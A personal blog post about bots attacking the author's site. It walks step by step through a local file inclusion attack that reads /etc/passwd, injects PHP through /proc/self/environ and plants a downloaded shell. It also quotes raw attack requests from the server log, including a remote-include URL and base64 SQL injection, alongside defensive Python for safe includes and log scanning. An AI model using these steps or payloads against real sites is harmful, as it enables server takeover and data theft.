Someone Trying To Inject IvanKristianto.com

Recently I had some bad news. Besides the digital world being at war between the piracy community and anti-piracy companies, my blog has also been attacked by an unknown party. In my opinion they are trying to find a vulnerability using a bot. They are trying to find a way to inject malicious code through a local file inclusion (LFI) vulnerability.

How malicious code gets injected through a local file inclusion vulnerability (the technique the bot was attempting against my blog):

  1. Check whether the website has the vulnerability. Look for a parameter that carries a file name:
    www.website.com/view.php?page=contact.php

    If the target site has a URL like that, there is a good chance it is vulnerable to LFI: the script is probably handing the parameter straight to include(). The pattern alone proves nothing; the next steps confirm it.

  2. Change contact.php to ../ and see whether it produces a warning:
    www.website.com/view.php?page=../

    If you get an error like this:

    Warning: include(../) [function.include]: failed to open stream: No such file or directory in /home/username/public_html/website.com/view.php on line 1337

    then there is a good chance of injecting malicious code. The warning proves that the parameter reaches include() unchanged, and it leaks the absolute path of the script, which tells you how many ../ are needed to reach the filesystem root (extra ../ beyond the root are ignored, which is why the probes below use more than strictly necessary).
  3. Try to read /etc/passwd:
    www.website.com/view.php?page=../../../../../etc/passwd

    If it shows something like this:

    root:x:0:0:root:/root:/bin/bash bin:x:1:1:bin:/bin:/sbin/nologin daemon:x:2:2:daemon:/sbin:/sbin/nologin adm:x:3:4:adm:/var/adm:/sbin/nologin lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin sync:x:5:0:sync:/sbin:/bin/sync shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown...

    then any file the web server user can read is being included, and you are ready for the next step.

  4. Check whether /proc/self/environ is readable:
    www.website.com/view.php?page=../../../../../proc/self/environ

    If you get no error message and a result like this:

    DOCUMENT_ROOT=/home/username/public_html GATEWAY_INTERFACE=CGI/1.1 HTTP_ACCEPT=text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1 HTTP_COOKIE=PHPSESSID=134cc7261b341231b9594844ac2ad7ac HTTP_HOST=www.website.com HTTP_REFERER=http://www.website.com/index.php?view=../../../../../../etc/passwd HTTP_USER_AGENT=Opera/9.80 (Windows NT 5.1; U; en) Presto/2.2.15 Version/10.00 PATH=/bin:/usr/bin QUERY_STRING=view=..%2F..%2F..%2F..%2F..%2F..%2Fproc%2Fself%2Fenviron REDIRECT_STATUS=200 REMOTE_ADDR=6x.1xx.4x.1xx REMOTE_PORT=35665 REQUEST_METHOD=GET REQUEST_URI=/index.php?view=..%2F..%2F..%2F..%2F..%2F..%2Fproc%2Fself%2Fenviron SCRIPT_FILENAME=/home/sirgod/public_html/index.php SCRIPT_NAME=/index.php SERVER_ADDR=1xx.1xx.1xx.6x [email protected] SERVER_NAME=www.website.com SERVER_PORT=80 SERVER_PROTOCOL=HTTP/1.0 SERVER_SIGNATURE=
    Apache/1.3.37 (Unix) mod_ssl/2.2.11 OpenSSL/0.9.8i DAV/2 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 Server at www.website.com Port 80

    then /proc/self/environ is accessible. Notice that the environment block echoes request headers such as HTTP_USER_AGENT and HTTP_REFERER: that is what makes the next step work, because whatever the client puts in those headers ends up in a file the server will include() as PHP. If you get a blank page or an error, /proc/self/environ is not readable (for example because open_basedir or a chroot keeps PHP inside the web root) or the OS is FreeBSD, which does not mount procfs by default.
  5. Inject the malicious code. Install the Tamper Data Firefox extension so the User-Agent header can be edited, start Tamper Data, and request:
    www.website.com/view.php?page=../../../../../proc/self/environ

    with the PHP payload in the User-Agent field:

    Then submit the request. Because the server include()s /proc/self/environ, the PHP placed in the User-Agent header is executed: it downloads the text shell from http://url-to-your malicious-code/ and saves it as shell.php in the website directory.
  6. Access your malicious code:
    www.website.com/shell.php
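The check that makes steps 1 to 6 fail, as an added example that is not part of the original post and not the code of any site it mentions: a Python model of what a view.php-style include($_GET['page']) does with the traversal strings above, beside a hardened resolver, plus the naive once-only "../" filter that the "....//" requests in the log below are built to slip past. The document root, the allowlist and all function names are assumptions for the example; a PHP fix uses the same logic (allowlist the name, reject control bytes, realpath the result and require it to stay under the web root).

```python
import os
import posixpath

# Assumed for the example: the web root from the warning in step 2 and the pages view.php may include.
DOCUMENT_ROOT = "/home/username/public_html"
ALLOWED_PAGES = {"contact.php", "about.php", "index.php"}


def resolve_unsafe(page: str) -> str:
    """Model of include($_GET['page']) run from DOCUMENT_ROOT: the client string is joined to the
    script's directory and normalised, so every '../' climbs one level, right out of the web root."""
    return posixpath.normpath(posixpath.join(DOCUMENT_ROOT, page))


def strip_traversal_once(page: str) -> str:
    """A common but broken 'fix': delete '../' a single time. '....//' loses its middle '../' and
    becomes '../' again, which is exactly what the '....//' requests in the log rely on."""
    return page.replace("../", "")


def resolve_filtered(page: str) -> str:
    """The broken fix in front of the unsafe include: stops plain '../' but not '....//'."""
    return resolve_unsafe(strip_traversal_once(page))


def resolve_safe(page: str):
    """Hardened resolver: the absolute path to include, or None when the request is rejected."""
    # 1. Control bytes: %00 once truncated C-string paths in PHP; there is never a legitimate use.
    if any(ord(c) < 0x20 for c in page):
        return None
    # 2. Exact-name allowlist: traversal, absolute paths, php:// wrappers and URLs all fail here,
    #    and no encoding or '....//' trick can turn itself into a fixed file name.
    if page not in ALLOWED_PAGES:
        return None
    # 3. Defence in depth: resolve symlinks and prove the final path still lies under the root.
    root = os.path.realpath(DOCUMENT_ROOT)
    full = os.path.realpath(os.path.join(root, page))
    if os.path.commonpath([root, full]) != root:
        return None
    return full


if __name__ == "__main__":
    for probe in ("contact.php", "../../../../../etc/passwd",
                  "../../../../../proc/self/environ", "....//....//....//....//....//proc/self/environ"):
        print(f"{probe}\n  unsafe   -> {resolve_unsafe(probe)}\n  filtered -> {resolve_filtered(probe)}"
              f"\n  safe     -> {resolve_safe(probe)}")
```

Run it and the third and fourth probes show the contrast: the unsafe resolver lands on /proc/self/environ for the plain "../" string, the once-only filter stops that string but lands there for "....//", and the allowlist rejects both.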
    

Using that technique, here is the proof that I was attacked (requests taken from my server log; the X-Forwarded-For and X-Real-Ip headers are where the client address appears in these entries):

GET /main.php?path=....//....//....//....//....//....//....//....//....//....//....//proc/self/environ%0000 HTTP/1.0
Connection: close
Host: www.ivankristianto.com
Te: deflate,gzip;q=0.3
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6
X-Forwarded-For: 134.208.10.111
X-Real-Ip: 134.208.10.111

GET /main.php?path=../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.0
Connection: close
Host: www.ivankristianto.com
Te: deflate,gzip;q=0.3
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6
X-Forwarded-For: 134.208.10.111
X-Real-Ip: 134.208.10.111

GET /main.php?path=../../../../../../../../../../../../../../../../../../../proc/self/environ HTTP/1.0
Connection: close
Host: www.ivankristianto.com
Te: deflate,gzip;q=0.3
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6
X-Forwarded-For: 134.208.10.111
X-Real-Ip: 134.208.10.111

GET  /os/ubuntu/beginners-guide-how-to-use-wget/http:/ioputas.com/index.php?option=com_s5clanroster&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.0
Connection: close
Host: www.ivankristianto.com
Te: deflate,gzip;q=0.3
User-Agent: libwww-perl/5.813
X-Forwarded-For: 89.187.142.150
X-Real-Ip: 89.187.142.150

GET /os/ubuntu/?_SERVER[DOCUMENT_ROOT]=http://amalocksmith.com/images/stories/fruit/.../walk1.gif?? HTTP/1.0
Connection: close
Host: www.ivankristianto.com
Te: deflate,gzip;q=0.3
User-Agent: Mozilla/5.0
X-Forwarded-For: 75.125.163.210
X-Real-Ip: 75.125.163.210

GET  /search.php?encode=YToxOntzOjQ6ImF0dHIiO2E6MTp7czoxNDI6IjEnKSBhbmQgMT0yIEdST1VQIEJZIGdvb2RzX2lkIHVuaW9uIGFsbCBzZWxlY3QgY29uY2F0KHVzZXJfaWQsMHgzYSx1c2VyX25hbWUsMHgzYSxwYXNzd29yZCwnIlwnKSB1bmlvbiBzZWxlY3QgMiMiJyksMSBmcm9tIGFkbWluX3VzZXIgbGltaXQgMyMiO2k6Mjt9fQ== HTTP/1.0
Connection: close
Host: www.ivankristianto.com
X-Forwarded-For: 222.76.218.41
X-Real-Ip: 222.76.218.41

# Someone probing xmlrpc.php, WordPress's XML-RPC endpoint:
GET /xmlrpc.php HTTP/1.0
Connection: close
Host: www.ivankristianto.com
Te: deflate,gzip;q=0.3
User-Agent: libwww-perl/5.837
X-Forwarded-For: 66.71.254.10
X-Real-Ip: 66.71.254.10

There are still a lot more of these. Speaking of security and vulnerabilities, there are many ways to do it. So keep your software up to date (in this case I'm using WordPress), back up your data regularly and watch your logs regularly. And I thank those who attacked me: because of you I learned something new, and I'm trying to find ways to harden my security, even though I'm still a newbie in this area.
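"Watch your logs regularly" is easier with a script, so here is an added example (not part of the original post, not a plugin listed below) that runs the patterns from the excerpts above over request blocks in the same shape: a literal ".." segment, the "....//" form that survives a once-only "../" strip, the %00 truncator, /proc/self/environ and /etc/passwd targets, a URL supplied as a parameter value together with a _SERVER[...] override attempt, a base64 parameter that decodes to SQL keywords (the search.php request above decodes to a serialised PHP array carrying a union/select against an admin_user table), and PHP tags in any request header, which is the step-5 vector. The log text is constructed from the requests quoted above plus one constructed request with PHP in its User-Agent and one benign request; the 203.0.113.x addresses are documentation addresses, and all tag names and functions are this example's own.

```python
import base64
import re
import urllib.parse

# Constructed sample in the shape of the excerpts above (request line, headers, blank line between
# requests): three blocks copied from the post, one constructed request with PHP in its User-Agent
# (203.0.113.x are documentation addresses), and one benign request the scanner must leave alone.
SAMPLE_LOG = """\
GET /main.php?path=....//....//....//....//....//....//....//....//....//....//....//proc/self/environ%0000 HTTP/1.0
Host: www.ivankristianto.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6
X-Real-Ip: 134.208.10.111

GET /os/ubuntu/?_SERVER[DOCUMENT_ROOT]=http://amalocksmith.com/images/stories/fruit/.../walk1.gif?? HTTP/1.0
Host: www.ivankristianto.com
User-Agent: Mozilla/5.0
X-Real-Ip: 75.125.163.210

GET /search.php?encode=YToxOntzOjQ6ImF0dHIiO2E6MTp7czoxNDI6IjEnKSBhbmQgMT0yIEdST1VQIEJZIGdvb2RzX2lkIHVuaW9uIGFsbCBzZWxlY3QgY29uY2F0KHVzZXJfaWQsMHgzYSx1c2VyX25hbWUsMHgzYSxwYXNzd29yZCwnIlwnKSB1bmlvbiBzZWxlY3QgMiMiJyksMSBmcm9tIGFkbWluX3VzZXIgbGltaXQgMyMiO2k6Mjt9fQ== HTTP/1.0
Host: www.ivankristianto.com
X-Real-Ip: 222.76.218.41

GET /main.php?path=../../../../../proc/self/environ HTTP/1.0
Host: www.ivankristianto.com
User-Agent: <?php echo "constructed sample"; ?>
X-Real-Ip: 203.0.113.7

GET /os/ubuntu/beginners-guide-how-to-use-wget/ HTTP/1.1
Host: www.ivankristianto.com
User-Agent: Mozilla/5.0
X-Real-Ip: 203.0.113.8
"""

TRAVERSAL = re.compile(r"(^|[/\\=])\.\.([/\\]|$)")  # a literal '..' path segment after '/', '\\' or '='
STRIP_BYPASS = re.compile(r"\.{4}/")                  # '....//' turns into '../' if a filter strips '../' once
REMOTE_URL = re.compile(r"[?&][^=&]*=https?://")      # a URL passed as a parameter value (remote include)
SQL_MARKERS = re.compile(r"union\s+(all\s+)?select|concat\(|group\s+by", re.I)
PHP_TAG = re.compile(r"<\?(php|=)", re.I)


def percent_decode(value: str, rounds: int = 3) -> str:
    """Decode %xx repeatedly (bounded) so double-encoded payloads normalise like plain ones."""
    for _ in range(rounds):
        decoded = urllib.parse.unquote(value)
        if decoded == value:
            break
        value = decoded
    return value


def base64_sql(value: str):
    """Return the decoded text when a parameter value is base64 hiding SQL keywords, else None."""
    if len(value) < 16 or not re.fullmatch(r"[A-Za-z0-9+/]+={0,2}", value):
        return None
    try:
        text = base64.b64decode(value, validate=True).decode("utf-8", "replace")
    except ValueError:  # binascii.Error is a ValueError
        return None
    return text if SQL_MARKERS.search(text) else None


def parse_log(text: str):
    """Yield (client_ip, target, headers) per request block; X-Real-Ip is what the proxy recorded."""
    for block in re.split(r"\n\s*\n", text.strip()):
        request_line, *header_lines = block.splitlines()
        target = request_line.split()[1]
        headers = {n.strip().lower(): v.strip() for n, _, v in (h.partition(":") for h in header_lines)}
        yield headers.get("x-real-ip", "?"), target, headers


def classify(target: str, headers: dict) -> set:
    """Tag one request with every attack pattern it shows; an empty set means it looks benign."""
    tags = set()
    decoded = percent_decode(target)
    if "\x00" in decoded:
        tags.add("null-byte")
    if TRAVERSAL.search(decoded):
        tags.add("traversal")
    if STRIP_BYPASS.search(decoded):
        tags.update({"traversal", "strip-bypass"})
    for marker, tag in (("/proc/self/environ", "proc-environ"), ("/etc/passwd", "etc-passwd"),
                        ("_SERVER[", "superglobal-override"), ("GLOBALS[", "superglobal-override")):
        if marker in decoded:
            tags.add(tag)
    if REMOTE_URL.search(decoded):
        tags.add("remote-include")
    # Inspect the raw query so base64 '+' and '=' survive, then judge each value on its own.
    for pair in target.partition("?")[2].split("&"):
        if base64_sql(pair.partition("=")[2]):
            tags.add("base64-sqli")
    if any(PHP_TAG.search(v) for v in headers.values()):
        tags.add("php-in-header")  # code that would run if /proc/self/environ were included
    return tags


def scan(text: str) -> list:
    """One finding per suspicious request, in log order; a quiet log returns an empty list."""
    return [{"ip": ip, "target": target, "tags": sorted(tags)}
            for ip, target, headers in parse_log(text)
            if (tags := classify(target, headers))]


if __name__ == "__main__":
    for finding in scan(SAMPLE_LOG):
        print(finding["ip"], ",".join(finding["tags"]), finding["target"][:70])
```

Running it prints four findings and stays silent on the benign request. The raw query is inspected separately from the percent-decoded target on purpose: decoding first would turn the "+" of a base64 value into a space and break the decode, while the traversal and null-byte checks need the decoded form.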

Thanks to:
WHM/CPanel
ClamAV
Wordpress plugin Bad Behavior
www.0x50sec.org

Comments

  1. Tim says:

    Very useful to know. I do PHP development as well, and security is vital nowadays.

  2. You might be lucky enough to find the attack immediately; otherwise it might be very costly for your site. Please stay alert always to avoid this kind of activity.

  3. I've emailed a report about this attack to my blog. What are good plugins to prevent this kind of attack?
